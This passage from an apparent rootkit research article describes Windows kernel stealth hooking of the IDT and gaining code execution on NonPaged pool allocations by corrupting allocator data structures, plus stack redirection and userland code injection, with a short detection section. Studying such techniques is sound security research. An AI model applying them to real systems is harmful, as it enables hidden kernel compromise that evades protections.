+example, our PacketIndicateHandler hook can search in the incoming packets 
+for a tag, when this tag his found the rootkit triggers a function.
+               
+---[ 2.2 - Conclusion about stealth hooking on IDT
+
+In this part we have seen how Windows manages his hardware interrupts by 
+using a global template function dedicated to all interrupts. The fact 
+that this template routine his forged for each interrupts is the main 
+point of this attack, with that we can create a fake template routine that 
+cannot be detected directly. The stealth of our attack remains on two 
+points :
+
+- We modify only dynamic allocated and forged code
+
+- We hijack highly temporal dynamic allocated structures which when 
+running, are always preempting the core. 
+
+So, even if the scope of our attack is restricted, controlling the hardware
+is the best way for a rk to reach critical components. Finally, we have 
+just cheated the system with its own features and that's the purpose of a 
+stealth rootkit.
+                
+--[ 3 - Owning NonPaged pool using stealth hooking
+
+Rootkit sophistication depends on how it subverts the kernel. More 
+complex techniques come out as kernel and hardware understanding evolve. 
+Nowadays there is so many ways to subvert the kernel, in consequence 
+protections become harder to defeat. We're going to present a different 
+means to gain control. Next techniques apply this approach to the kernel 
+memory allocator. 
+
+Our goal is getting execution on every NonPaged allocation without using
+any hook. It must bypass any hooking verification even those based on code 
+page comparison or hashing. It will be done by modifying data used by the 
+allocator. We just apply the concept of using code against itself. We do 
+believe that this concept can be used on others components and in 
+different ways successfully.
+
+We won't try to convince you that this technique is perfect. It evades 
+current protections and detection systems. The more important is that they 
+would need more than a simple modification to prevent and block an attack
+based on kernel code behavior.
+
+---[ 3.1 - Kernel allocation layout review
+
+As every operating system, Windows kernel puts forward some functions in 
+order to allocate or free memory. Virtual memory is organized as block of 
+memory called pages. In Intel x86 architecture, a page size is 4096 bytes 
+and most allocations requests are smaller. Thus, kernel functions like 
+ExAllocatePoolWithTag and ExFreePoolWithTag kept unused memory blocks for 
+next allocations. Internal functions directly interact with hardware each 
+time a page is needed. All those procedures are complex and delicate that's
+why drivers trust kernel implementation.
+
+-----[ 3.1.1 - Difference between Paged and NonPaged pool
+
+Kernel system memory is divided in two different kind of pool. It has been 
+separated to distinguish most used memory blocks. The system must know 
+which pages should be resident and which can be temporarily discarded. The 
+page fault handler restores pageable memory only when IRQL is inferior of
+DPC or DISPATCH level. Paged pool can be paged in or out of the system. A 
+memory block paged out will be saved on the file system and so unused part 
+of paged memory will not be resident in memory. NonPaged pool is present 
+in every IRQL level and then is put-upon for important tasks.
+
+The file pagefile.sys contains paged out memory. It was attacked to inject 
+unsigned code into Vista kernel [32]. Some solutions was discussed as 
+disabling kernel memory paging. Joanna Rutkowska defended this solution as
+more secure than others but with a small physical memory loss. Microsoft
+just denied raw disk access, which may prove that Paged and NonPaged 
+layout is an important feature of Windows kernel [33].
+
+This article focuses on NonPaged pool layout as PagedPool handling is 
+totally different. NonPaged pool can be more or less considered as 
+following a typical heap implementation. Global information about system 
+pool can be found in Microsoft Windows Internals [34].
+
+-----[ 3.1.2 - NonPaged pool tables
+
+The allocation algorithm must be fast allocating on the most used sizes. 
+That why three different tables exist and each one is devoted to a size 
+range. We found this organization in most memory management algorithms. 
+Retrieving memory blocks from hardware takes time. Windows balances between
+response faster and avoid memory wasting. Response time becomes faster if 
+memory blocks are stored for next allocations. In the other hand, if you 
+keep too much memory, it can penalize memory demands.
+
+Each table implements a different way to store memory blocks. We will 
+present each table and where you can find them.
+
+The NonPaged lookaside is a per-processor table covering size inferior or 
+equal to 256 bytes. Each processor has a processor control register (PCR) 
+storing data concerning only a single processor like IRQL level, GDT, IDT. 
+Its extension called processor control region (PCRB) contains lookasides 
+tables. Next windbg dump presents NonPaged lookaside table and its 
+structure.
+
+kd> !pcr
+KPCR for Processor 0 at ffdff000:
+    Major 1 Minor 1
+  NtTib.ExceptionList: 805486b0
+      NtTib.StackBase: 80548ef0
+     NtTib.StackLimit: 80546100
+   NtTib.SubSystemTib: 00000000
+        NtTib.Version: 00000000
+    NtTib.UserPointer: 00000000
+        NtTib.SelfTib: 00000000
+
+              SelfPcr: ffdff000
+                 Prcb: ffdff120
+                 Irql: 00000000
+                  IRR: 00000000
+                  IDR: ffffffff
+        InterruptMode: 00000000
+                  IDT: 8003f400
+                  GDT: 8003f000
+                  TSS: 80042000
+
+        CurrentThread: 80551920
+           NextThread: 00000000
+           IdleThread: 80551920
+
+            DpcQueue:  0x80551f80 0x804ff29c
+kd> dt nt!_KPRCB ffdff120
+[...]
+   +0x5a0 PPNPagedLookasideList : [32]
+      +0x000 P                : 0x819c6000 _GENERAL_LOOKASIDE
+      +0x004 L                : 0x8054dd00 _GENERAL_LOOKASIDE
+[...]
+kd> dt nt!_GENERAL_LOOKASIDE
+   +0x000 ListHead         : _SLIST_HEADER
+   +0x008 Depth            : Uint2B
+   +0x00a MaximumDepth     : Uint2B
+   +0x00c TotalAllocates   : Uint4B
+   +0x010 AllocateMisses   : Uint4B
+   +0x010 AllocateHits     : Uint4B
+   +0x014 TotalFrees       : Uint4B
+   +0x018 FreeMisses       : Uint4B
+   +0x018 FreeHits         : Uint4B
+   +0x01c Type             : _POOL_TYPE
+   +0x020 Tag              : Uint4B
+   +0x024 Size             : Uint4B
+   +0x028 Allocate         : Ptr32     void*
+   +0x02c Free             : Ptr32     void
+   +0x030 ListEntry        : _LIST_ENTRY
+   +0x038 LastTotalAllocates : Uint4B
+   +0x03c LastAllocateMisses : Uint4B
+   +0x03c LastAllocateHits : Uint4B
+   +0x040 Future           : [2] Uint4B
+   
+Lookaside tables permit faster block retrieving than typical double linked 
+list. For this optimization lock time is really important and a single 
+linked list is a faster mechanism than software locking. 
+ExInterlockedPopEntrySList function is used to pop an entry from a single 
+linked list using hardware locking instruction "lock".
+
+PPNPagedLookasideList is the lookaside table we were talking about. It 
+contains two lookaside lists P and L. Depth field of the GENERAL_LOOKASIDE 
+structure defines how many entries can be in ListHead single list. The 
+system updates regularly the depth using different counters. The update 
+algorithm is based on processor number and is different for P and L. Depth 
+of the P list is updated more frequently than L list as it optimizes 
+performances on very small blocks.
+
+The second table depends how many processors are used and how system 
+managed them. Allocation system walk it if size is inferior or equal to 
+4080 bytes or if lookaside research failed. Even if target table can 
+change, it always has the same POOL_DESCRIPTOR structure. On single 
+processor, a variable called PoolVector is used to retrieve 
+NonPagedPoolDescriptor pointer. On multi processor, the 
+ExpNonPagedPoolDescriptor table has 16 slots containing pool descriptors. 
+Each processor PRCB points on a KNODE structure. A node can be linked on 
+more than one processor and contains a color field used as an index in 
+ExpNonPagedPoolDescriptor. Next figures illustrate this algorithm.
+
+          PoolVector
+        +------------+
+        |  NonPaged  | --------------> NonPagedPoolDescriptor
+        |------------+
+        |   Paged    |
+        +------------+
+
+         [ Figure 1 - Single processor pool descriptor ]
+
+         Processor #1
+        +------------+
+        |            |                  ExpNonPagedPoolDescriptor
+        |    PRCB  ------\                +-------------------+
+        |            |   |          /---------> SLOT #01      |
+        +------------+   |          |     |     SLOT #02      |
+               /---------/          |     |     SLOT #03      |
+               |         KNODE      |     |     SLOT #04      |
+               |---> +------------+ |     |     SLOT #05      |
+               |     | Proc mask  | |     |     SLOT #06      |
+               |     | color (01) --/     |     SLOT #07      |
+               |     | ...        |       |     SLOT #08      |
+               |     +------------+       |     SLOT #09      |
+               |                          |     SLOT #10      |
+               \---------\                |     SLOT #11      |
+         Processor #2    |                |     SLOT #12      |
+        +------------+   |                |     SLOT #13      |
+        |            |   |                |     SLOT #14      |
+        |    PRCB  ------/                |     SLOT #15      |
+        |            |                    |     SLOT #16      |
+        +------------+                    +-------------------+
+
+        [ Figure 2 - Multiple processor pool descriptor ]
+
+A global variable ExpNumberOfNonPagedPools defines if multi processor case 
+is used. It should reflect processor number but it can change between 
+operating system versions.
+
+The next dump shows POOL_DESCRIPTOR structure from windbg.
+
+kd> dt nt!_POOL_DESCRIPTOR
+   +0x000 PoolType         : _POOL_TYPE
+   +0x004 PoolIndex        : Uint4B
+   +0x008 RunningAllocs    : Uint4B
+   +0x00c RunningDeAllocs  : Uint4B
+   +0x010 TotalPages       : Uint4B
+   +0x014 TotalBigPages    : Uint4B
+   +0x018 Threshold        : Uint4B
+   +0x01c LockAddress      : Ptr32 Void
+   +0x020 PendingFrees     : Ptr32 Void
+   +0x024 PendingFreeDepth : Int4B
+   +0x028 ListHeads        : [512] _LIST_ENTRY
+
+Queued spinlock synchronization, part of HAL library, is used to restrict 
+concurrency on a pool descriptor. It assures that only one thread and one 
+processor will access and unlink an entry from a pool descriptor. HAL 
+library changes on different architectures and what is a simple IRQL 
+raising on single processor becomes a more complex queued system on 
+multi-processor. For default pool descriptor, general NonPaged queued 
+spinlock is locked (LockQueueNonPagedPoolLock). Else, a custom queued 
+spinlock is created.
+
+The third and last table is shared by processors for size superior of 4080 
+bytes. MmNonPagedPoolFreeListHead is also used when others tables lack 
+memory. It composed by 4 LIST_ENTRY each one representing a page number, 
+except for the last one which holds all superiors pages kept by the system.
+Access to this table is guarded by general non paged queued spinlock 
+also called LockQueueNonPagedPoolLock. During the free procedure of a 
+smaller block, ExFreePoolWithTag merges it with previous and next free 
+blocks. It can create a block superior or equal to 1 page. In this case, 
+the new block is added in the MmNonPagedPoolFreeListHead table.
+
+-----[ 3.1.3 - Allocation and free algorithms
+
+Kernel allocation does not change that much between OS versions but its 
+algorithm is as hard as the userland heap one. In this part, we want to 
+illustrate basic behavior between tables during allocation or free 
+procedures. A lot of details have been thrown away such as synchronization 
+mechanisms. Those algorithms will help you for the technique explanation 
+but also understanding the basic elements of kernel allocation. Despite 
+kernel exploitation is not part of this paper, pool overflow is an 
+interesting topic that needs understanding of some part of this algorithm. 
+
+NonPaged pool allocation algorithm (ExAllocatePoolWithTag):
+
+    IF [ Size > 4080 bytes ]
+      [
+        - Call the MiAllocatePoolPages function
+          - Walk MmNonPagedPoolFreeListHead LIST_ENTRY table.
+          - Retrieve memory from hardware if necessary.
+          - Return memory page aligned (without header).
+      ]
+
+    IF [ Size <= 256 bytes ]
+      [
+        - Pop entry from PPNPagedLookasideList table.
+        - If something is found return memory block.
+      ]
+
+    IF [ ExpNumberOfNonPagedPools > 1 ]
+      - PoolDescriptor from ExpNumberOfNonPagedPools and used index
+        comes from PRCB KNODE color.
+    ELSE
+      - PoolDescriptor is PoolVector first entry, designed by symbol
+        as NonPagedPoolDescriptor.
+
+    FOREACH [ >= Size entry of PoolDescriptor.ListHeads ]
+      [
+        IF [ Entry is not empty ]
+          [
+            - Unlink entry and split it if needed
+            - Return memory block
+          ]
+      ]
+
+    - Call the MiAllocatePoolPages function
+      - Walk MmNonPagedPoolFreeListHead LIST_ENTRY table..
+      - Split it correctly to the right size
+      - Return new memory block
+
+NonPaged pool free algorithm (ExFreePoolWithTag) :
+
+    IF [ MemoryBlock is page aligned ]
+      [
+        - Call the MiFreePoolPages function
+          - Determine block type (Paged or NonPaged)
+          - Depending on how many blocks are kept in
+            MmNonPagedPoolFreeListHead, we release it to the hardware.
+      ]
+    ELSE
+      [
+        - Merge previous and next block if possible
+
+        IF [ NewMemoryBlock size <= 256 bytes ]
+          [
+            - Look at PPNPagedLookasideList entry depth and see if we
+              should keep it.
+            - We return if memory block is pushed into lookaside list
+          ]
+
+        IF [ NewMemoryBlock size <= 4080 bytes ]
+          [
+            - Use POOL_HEADER PoolIndex variable to determine which
+              PoolDescriptor must be used.
+            - Insert it in the proper LIST_ENTRY array entry
+            - If anything goes well, return
+          ]
+
+        - Depending on how many blocks are kept in
+          MmNonPagedPoolFreeListHead, we release it to the hardware.
+      ]
+
+Paged pool algorithm is very different especially for page aligned blocks. 
+Smaller size management should be not that far from NonPaged but in 
+assembly code we definitely saw that NonPaged and Paged pool are totally 
+separated. Once you know a little more about how NonPaged allocation works,
+we can now talk about exploitation part.
+
+---[ 3.2 - Getting code execution abusing allocation code
+
+Our main goal is getting code execution on every allocation attempts for  
+NonPaged pool only. This result must be done only by changing data used by 
+targeted code. Our purpose is proving that kernel code can serve our 
+interest only by changing typical data environment. Our work is based
+on a new rootkit developed to gain control over NonPaged allocation.
+
+We start with getting code execution for allocation superior or equal
+to 1 page. As we saw on previous part, it concerns the third and last 
+table.
+
+-----[ 3.2.1 - Data corruption of MmNonPagedPoolFreeListHead
+
+MmNonPagedPoolFreeListHead conserves page aligned memory blocks to speed up
+memory allocation. It links held memory block using a LIST_ENTRY structure.
+This structure is common and use in Windows heap library for example.
+
+kd> dt nt!_LIST_ENTRY
+   +0x000 Flink            : Ptr32 _LIST_ENTRY
+   +0x004 Blink            : Ptr32 _LIST_ENTRY
+
+MmNonPagedPoolFreeListHead access is protected by general NonPaged queued 
+spinlock LockQueueNonPagedPoolLock. It assures that only one thread and 
+processor can look and modify this structure.
+
+So we need a way to get control over allocation and unlinking procedure 
+seems perfect. We can poison this linked list with a fake entry, with the 
+highest size possible, which unlinking will modify current executed code. 
+At kernel level, you can modify code as data without any protection issues.
+Unlinking was used when heap exploitation started [20] but modifying code 
+was not possible from userland. As spinlock assures us exclusivity, there 
+is no risk on some race condition. The created "hook" would be dynamic and 
+code restored directly. Page guard protection reverse [18] shows that code 
+is only checked every 5 minutes. Whether a modification is found, real code
+is just replaced.
+
+This method has plenty assets but also a lot of obstacles. Let start by
+enumerating all those obstacles :
+
+ - On a basic implementation of unlinking, list become unwalkable.
+   It breaks most utilization of the table.
+ - Pass through page cleaning methods and always be the first block on the 
+   list otherwise we could miss some call.
+ - We break code path and sooner or later we must return as if our
+   hijacking has never been there and everything goes fine.
+ - Processor prefetch make self code modification dangerous.
+
+Unlinking gives us 4 bytes overwriting to build an opcode and create a 
+redirection. In our case, we influenced current context and a register 
+should point to the unlinked entry. We said should point without choosing a
+single register because kernel changes between versions or service packs. 
+As soon as we discuss context, we will stay talking about general 
+situations. We choose to make a jmp [reg+XX] which is FF60XX in hex.
+
+This technique effectiveness lies on keeping the MmNonPagedPoolFreeListHead
+walkable. A double linked list, as LIST_ENTRY, is walkable if Flink is 
+correct. Therefore we can choose an address for Flink as 0xXXXX60FF and 
+Blink will point to the code address. The Intel x86 architecture using 
+little endian our address is quite easy to found, we must check opcode 
+offset and discard too close possibilities. Next figure illustrates a 
+poisoned entry.
+
+          MmNonPagedPoolFreeListHead[i]
+   /------> +--------------------+
+   |        |       Flink        | ---\
+   |        |--------------------|    |
+   |  <---- |       Blink        |    |
+   |        +--------------------+    |
+   |        |        ...         |    |
+   |        +--------------------+    |
+   |  /-------------------------------/
+   |  |
+   |  |         Poisoned entry
+   |  |     +--------------------+
+   |  |     | PreviousSize : -   |
+   |  |     +--------------------+
+   |  |     |   PoolIndex : -    |
+   |  |     +--------------------+
+   |  |     | PoolType: NonPaged |
+   |  |     +--------------------+
+   |  |     |   BlockSize : i    |
+   |  |     +--------------------+
+   |  |     |    PoolTag : -     |
+   |  \---> +--------------------+
+   |        | Flink : 0xYYXX60FF | <--\
+   |        |--------------------|    |
+   |   X--- | Blink : 0x80YYYYYY |    |
+   |        +--------------------+    |
+   |                                  |
+   |  /-------------------------------/
+   |  |     Fake entry (0xYYXX60FF)
+   |  |     +--------------------+
+   |  |     | PreviousSize : -   |
+   |  |     +--------------------+
+   |  |     |   PoolIndex : -    |
+   |  |     +--------------------+
+   |  |     | PoolType: NonPaged |
+   |  |     +--------------------+
+   |  |     |   BlockSize : < i  |
+   |  |     +--------------------+
+   |  |     |    PoolTag : -     |
+   |  |---> +--------------------+
+   |  |     | Flink : 0x80.....  | ---\
+   |  |     |--------------------|    |
+   |  \---- | Blink : Poisoned   |    |
+   |        +--------------------+    |
+   \--------------- [...] ------------/
+
+    Unlinking instruction      : mov [0x80YYYYYY], 0xYYXX60FF
+    New Opcode after unlinking : jmp [reg+XX] (FF 60 XX)
+
+   [ Figure 3 - Poisoned double linked list ]
+   
+This figure shows a MmNonPagedPoolFreeListHead entry layout that assures 
+predicted unlinking and then code execution. We must maintain this layout 
+or we will lose our position. NonPaged blocks come from two different 
+virtual memory ranges. The second memory region start is stored in 
+MmNonPagedPoolExpansionStart. A cleaning function is called sometime to 
+free blocks from the expansion NonPaged pool. To avoid this cleaning, we 
+can use a Paged pool block locked. You can lock a memory block with the
+MmProbeAndLockPages function. This lock makes described memory region as 
+resident. Another more discreet way is to remap a NonPaged block with the 
+function MmMapLockedPagesSpecifyCache. It is more discrete because this 
+mapping would be just before expansion NonPaged pool memory range. Using
+a locked Paged pool block creates an address totally differently. A quick 
+look at those addresses between NonPaged ones show a clear difference.
+As virtual memory is very large, it does not take too much time to find 
+an address like 0xYYXX60FF. We will not unlock those pages until our
+technique is running.
+
+To defeat code path issues we differentiate two different states. The first
+state is when our block is selected. The second state is when our block is 
+unlinked. If we were able to return to the first step with our next fake 
+entry selected, we could continue walking code as normal. We achieve that 
+by using a generic approach. At IRQL equal to DISPATCH_LEVEL, we corrupt a 
+MmNonPagedPoolFreeListHead entry with some invalid pointers. With a hook on
+the page fault handler we are capable to see first and second stages, 
+restore the right context each time and save context difference between 
+those states. 
+
+Assembly dump from MiAllocatePoolPages :
+
+  lea     eax, [esi+8] ; Stage #1 esi is selected block and esi+8 its size
+  cmp     [eax], ebx   ; Check with needed size
+  mov     ecx, esi
+  jnb     loc_47014B
+  [...]
+  
+loc_47014B:
+  sub     [esi+8], ebx
+  mov     eax, [esi+8]
+  shl     eax, 0Ch
+  add     eax, esi
+  cmp     _MmProtectFreedNonPagedPool, 0 ; Protected mode, don't care
+  mov     [ebp+arg_4], eax
+  jnz     short loc_47016E
+  mov     eax, [esi]      ; \ Stage #2
+  mov     ecx, [esi+4]    ; | Unlinking
+  mov     [ecx], eax      ; | procedure
+  mov     [eax+4], ecx    ; /
+  jmp     short loc_470174
+
+Now let's see how it works during our test technique with interrupt fault
+handler (int 0xE) hooked :
+
+  lea     eax, [esi+8]
+                       ; Stage #1 - Check with needed size
+  cmp     [eax], ebx   ; ----> PAGE FAULT esi = 0xAAAAAAAA | eax = esi + 8
+                       ;     - We keep EIP and all registers
+                       ;     - Scan all registers for 0xAAAAAAAA +/- 8
+                       ;       and correct the current context. Continue.
+  mov     ecx, esi
+  jnb     loc_47014B
+  [...]
+  
+loc_47014B:
+  sub     [esi+8], ebx
+  mov     eax, [esi+8]
+  shl     eax, 0Ch
+  add     eax, esi
+  cmp     _MmProtectFreedNonPagedPool, 0 ; Protected mode, don't care
+  mov     [ebp+arg_4], eax
+  jnz     short loc_47016E
+  mov     eax, [esi]      ; \ Stage #2 - Unlinking procedure
+  mov     ecx, [esi+4]    ; |
+  mov     [ecx], eax      ; | ------> PAGE FAULT ecx = 0xBBBBBBBB
+                          ; |                    eax = 0xCCCCCCCC
+                          ; |     - Keep EIP and sub this context from
+                          ; |       Stage #1 saved context
+                          ; |     - Change fault registers and 
+                          ; |       structure pointers. Continue.
+  mov     [eax+4], ecx    ; /
+  jmp     short loc_470174
+    
+Fault addresses 0xAAAAAAA, 0xBBBBBBBB and 0xCCCCCCCC must point on invalid
+addresses to force a caught page fault. This test is made only once and 
+when we still have exclusivity on all processors. The int 0xE (page fault)
+handler is restored just after.
+
+This generic technique permits us to restore a valid context just before 
+selected block size is checked. Once we get code execution, we apply 
+context difference, change the current block register and then return at 
+first stage address. It works well because our two stages are very close, 
+once a selected block size is checked, unlinking is directly made.
+
+Given examples were based on a single LIST_ENTRY of the 
+MmNonPagedPoolFreeListHead table but you must poison all entries. If a 
+given entry is empty (except for our fake blocks), the algorithm tries 
+next the entry. It means we will be called more than one time per 
+allocation. We created a mechanism to manage multiple call on a single 
+allocation. If the first entry is empty, the second entry is used and so 
+on. Then we will be called twice or more. By checking current table, we 
+can predict a future code execution on the same allocation and avoid 
+executing payload more than one time per allocation request.
+
+Prefetch is a processor feature that retrieves more than a single 
+instruction from memory before it executes them. Some processor use a 
+complex branch prediction algorithm to fetch as much instruction as 
+possible. After some tests, we saw that processors invalidate code cache 
+when a modification occurs in cached memory addresses. Our driver supports 
+a case where code modification could be right after current instruction. 
+To achieve that we created a routine which calculates prefetch cache size 
+and consider it in next parts of our technique. We could also search 
+specifics instructions which clean prefetch cache like a far jump but it 
+can only be used as an option.
+
+This technique gives us code execution for NonPaged allocation superior or 
+equal to 1 page. It achieves that with a stealth hook, created by kernel 
+code and cleaned by our routine directly after. It's far from being 
+perfect as those allocations are not used that much. Next part describes 
+how this technique can be extended to gain control over all NonPaged pool 
+allocations.
+
+-----[ 3.2.2 - Expend it for every size
+
+Others lists can not be hijacked the same way because synchronization 
+mechanisms are not exclusive. Changing some assembly code becomes tricky if
+it can be executed by more than one thread at a time. Our method is 
+assuring our previous technique execution on any allocation. Once we have 
+control, we can find a way to retore ExAllocatePoolWithTag context with a 
+correct return value. We must do that without recoding a single line of 
+memory allocator. It is possible to create our own allocator but Windows 
+one is great and it will perfectly do the job for us.
+
+During allocation, the lookaside list is checked first. It will pop an 
+entry and if this entry is not NULL, use it. This entry comes from 
+GENERAL_LOOKASIDE ListHeader field. This field structure is SLIST_HEADER.
+
+kd> dt nt!_SLIST_HEADER .
+   +0x000 Alignment        : Uint8B
+   +0x000 Next             :
+      +0x000 Next             : Ptr32 _SINGLE_LIST_ENTRY
+   +0x004 Depth            : Uint2B
+   +0x006 Sequence         : Uint2B
+
+The ExInterlockedPopEntrySList function pops an entry from a SLIST_HEADER
+structure. The Next field is a pointer to the next SLIST node (single 
+linked list). The Depth field represents how many entries are kept in the 
+list. ExFreePoolWithTag compare GENERAL_LOOKASIDE optimal depth with 
+current SLIST_HEADER depth. ExAllocatePoolWithTag does not check this 
+field and just looks if some entry can be popped out Next field. To stunt 
+allocation and free procedure on NonPaged lookaside table, we set Next 
+field to NULL and Depth field to 0xFFFF. This state will be preserved and 
+this table will not be used anymore. 
+
+Our technique expansion relies entirely on subverting how the 
+ExpNonPagedPoolDescriptor table is used. In the previous part, we explained
+global variable ExpNumberOfNonPagedPools involvement in this process. It 
+is possible to expand number of NonPaged pools and then play with current 
+KNODE color. During allocation, the KNODE color defines which pool 
+descriptor is used. Then during free procedure, PoolIndex field of 
+POOL_HEADER keep pool descriptor color.
+
+So we can use this nice feature to our advantage. Default KNODE color on 
+every processors would point on an empty pool descriptors. It will lead to 
+code execution using our base technique. If the function 
+MiAllocatePoolPages return address is not the one use for classical page 
+rounded allocation, we know that a smaller allocation occur. All we have 
+to do is switch PRCB KNODE pointer to a copy with custom color and recall 
+ExAllocatePoolWithTag. Everything related to allocation and block 
+management will be implemented as it needs to be even if it differs 
+between operating system versions. Returned blocks PoolIndex will point to 
+our own pool descriptor and free procedure, which will perfectly work. Lets
+see how it will look on a single processor.
+
+      ExpNonPagedPoolDescriptor
+        +-------------------+  
+        | PREVIOUS POOLDESC | <--- Kept for compatibility (0)
+        |  EMPTY POOLDESC   | <--- Default KNODE->color (1)
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |        --         |  
+        |  CUSTOM POOLDESC  | <--- Used for our allocations (16)
+        +-------------------+  
+
+      [ Figure 4 - Corrupted ExpNonPagedPoolDescriptor ]
+      [            on single processor                 ]
+
+This setup is just an example and you can manage the arrangement as you 
+want. We could transfer previous blocks from older pool descriptors in our 
+own and then receive free blocks. It is also possible to use multiple pool 
+descriptors and so on. Beware of system pool descriptor recycling as it can
+leads to strange behavior specially on multi-processor architecture.
+
+Once we have our fresh allocated block, we must return at 
+ExAllocatePoolWithTag return address. MiAllocatePoolPages has been called 
+to retrieve a new page and fill the current pool descriptor with it. It's 
+obvious that we can't return normally and let page allocation occurs. On 
+Intel x86 architecture the stack is used to store local variables, 
+arguments and saved registers. The Windows compiler starts by reserving 
+local variable and then pushes each register before its modification. 
+The next figure shows our stack configuration once we have code execution.
+
+    top
+      +--------------------+
+      | Our stack elements |      Restore assembly example
+      +--------------------+ <------ /---------------\
+      |                    |         | pop ecx       |
+      |  Saved registers   |         | pop ebx       |
+      |                    |         | pop esi       |
+      +--------------------+         | leave         |
+      |                    |         | retn 0Ch      |
+      |                    |         \---------------/
+      |                    |                |
+      |                    |                |
+      |  Stack variables   |                |
+      |                    |                |
+      |                    |                |
+      |                    |                |
+      +--------------------+         [new stack level]
+      |     Saved EBP      |                |
+      +--------------------+                |
+      |   Return Address   |                |
+      +--------------------+                |
+      |                    |                |
+      | Function arguments |                |
+      |                    |                |
+      +--------------------+ <--------------/
+    bottom
+
+      [ Figure 5 - Stack context after code execution ]
+      [            ~ small blocks case ~              ]
+
+The restore assembly part shows correct assembly in current function which 
+perfectly restores the context. It does not correspond of the first series 
+of pop instruction before return. There is an important risk that some 
+register has not been pushed yet. It is possible to deduce the pushed 
+register number by looking at function prologue when stack variables are 
+reserved. In the Windows compiler, it's quite simple and we can easily 
+calculate the pushed register number. A simple disassembly analysis on 
+needed pop register number does the job. It must be done for 
+MiAllocatePoolPages and ExAllocatePoolWithTag. We change the return 
+address stored in the stack and go to the deduced MiAllocatePoolPages 
+address. Last step is setting eax register for the return value. Both 
+functions return a value and preserve eax value. Our analyzer is dynamic 
+and registers each pop and its register. That why we can restore the 
+proper context even if it changes between versions.
+
+The Windows compiler is really easy to predict and does not create too 
+strange assembly organization. This technique is theoretically possible 
+on every assembly code that follow stdcall specification. The approach 
+could differ on others compilers.
+
+---[ 3.3 Exploit our position
+
+This article present a way of subverting the Windows kernel by modifying 
+only data. No function pointers, no static hooking or others classical 
+technique. It could exempt us of any other explanation. But it would not 
+be complete without some concrete examples. I personally believe that the 
+only limitation here is imagination.
+
+-----[ 3.3.1 Generic stack redirection
+
+Allocation occurs in so many places that you must rely on known context 
+and functions. Once everything is setup and before releasing exclusivity, 
+some stack redirection database can be created.
+
+The first way to do this is calling a handler if stack backtracing 
+reveals a specific function. Stack backtracing shows only return addresses
+and not which function call it. Debuggers resolve those functions by deep
+analysis or symbol checking. Implementing those features would take too 
+much time. So it's better to target a specific return address on 
+ExAllocatePoolWithTag stack frame. It will definitely improve check speed. 
+To do that, we indicates to our stack redirection API that we target a 
+specific function. Then launch a normal call or procedure that will lead to
+our function. Every allocation during this time will show important 
+backtrace stacks.
+
+Let say, we target an IRP and we know which function handles it by looking 
+at IRP dispatch table. We also know by reversing that it will allocate a 
+NonPaged block. Launching an I/O request, our API could register some 
+NonPaged call and recognize later.
+
+In the wild, it will call the appropriate handler with sub context 
+information. Sometimes getting a context is not enough. The second way 
+stays on same principles but modifies the stack to assure our handler is
+called once the function end. Efficiency depends on what is your target 
+and how you modifying it. 
+
+-----[ 3.3.2 Userland process code injection
+
+This technique can be also used to inject code in userland to subvert 
+trusted applications. NonPaged allocation occurs a lot in kernel mode and 
+it happens in every process. Some kernel drivers like win32k.sys call 
+userland many times. This call is achieve by the function 
+KeUserModeCallback [35]. It modifies userland stack to switch temporarily
+for a call in userland. Available functions are limited by a table. 
+
+Userland injection from kernel should not be resident and only concern
+known trusted application as browsers. Injection can be done on 
+explorer.exe as well to launch an hidden instance of a trusted program.
+KeUserModeCallback algorithm can be easily remade or copied then 
+relocated.Redirection table could be subverted to redirect the call. We 
+can also think about exploiting userland calls. It does not make any sense 
+to add checks on those available functions.
+
+--[ 4 - Detection
+
+This article does not try to convince you that subverting IDT or 
+allocation mechanism using advanced technique is the future. Most detection
+tools only indicate if a rookit may or may not be in this computer. It has 
+pains identifying which module is responsible. It detects antivirus or 
+firewall as rootkits. A protection layout could detect itself as a rootkit 
+because it does everything a rootkit does and so does not ask it to block 
+or uninstall a rootkit. Rootkit papers demonstrate so many great ways to 
+easily bypass those protections. But we don't see much those techniques in 
+the wild, simply because rootkits don't need them for the moment. 
+
+Detect software behavior modification could be part of a Verifiable 
+Operating System [36]. It will involve basic checks on known memory 
+structures. Checks integrity of LIST_ENTRY structures and correct them if
+needed. We can blame rootkit protections as much as we want but detecting 
+rootkits on a closed operating system is almost impossible. Gives more 
+information for kernel components will certainly leads to more 
+sofisticates attacks. In the other hand, it could reduce attack surface. 
+It is specially true on a defence oriented operating system. Next 
+protection improvements should come from the operating system itself.
+
+Now that there are hardware improvements for virtualisation, such as
+hypervisors, there will be extensions to hardware to detect and protect
+against rootkits. It offers a real control on operating system behavior 
+without advanced research on kernel layout. Some protections techniques 
+that were impossible to implement in Windows environment like PAX, could 
+rely on those hardware features. Our techniques could be detected by 
+registering and monitoring some specific events on the processor. It is 
+possible today to do that but performance issues are important.
+
+Our attacks could be blocked using targeted protection such as signatures. 
+An attack is defined as how many times it takes to create a generic 
+protection. In this area, Patchguard is an important improvement.
+
+--[ 5 - Conclusion
+
+This papers techniques were made to show that elegant software hijacking 
+can still evades most protections and avoid any performance issues or 
+unstable behaviors. Even though, these techniques are hardly reliable and
+should be considered only as a technical proof of concept. New protections
+are not efficient enough or present. They do not represent a threat for
+a rootkit which targets millions of computers. Reversing is an important 
+tool in improving software rootkits techniques. Detecting that a rootkit
+is present should not be enough. A protection which cannot uninstall a
+rootkit or prevent infection is useless. Drivers signatures was a good 
+idea as it was designed to stop current infections entries. But infection
+prevention includes local kernel exploitation. Generic detection of those 
+attacks would need an important improvement in anti-rootkits protections 
+and operating system design.
+
+--[ 6 - References
+
+[1] Holy Father, Invisibility on NT boxes, How to become unseen on Windows 
+NT (Version: 1.2)
+http://vx.netlux.org/lib/vhf00.html
+
+[2] Holy Father, Hacker Defender
+https://www.rootkit.com/vault/hf/hxdef100r.zip
+
+[3] 29A
+http://vx.netlux.org/29a
+
+[4] Greg Hoglund, NT Rootkit
+https://www.rootkit.com/vault/hoglund/rk_044.zip
+
+[5] fuzen_op, FU
+http://www.rootkit.com/project.php?id=12
+
+[6] Peter Silberman, C.H.A.O.S, FUto
+http://uninformed.org/?v=3&a=7 
+
+[7] Eeye, Bootroot
+http://research.eeye.com/html/tools/RT20060801-7.html
+
+[8] Eeye, Pixie
+http://research.eeye.com/html/papers/download/
+eEyeDigitalSecurity_Pixie%20Presentation.pdf
+
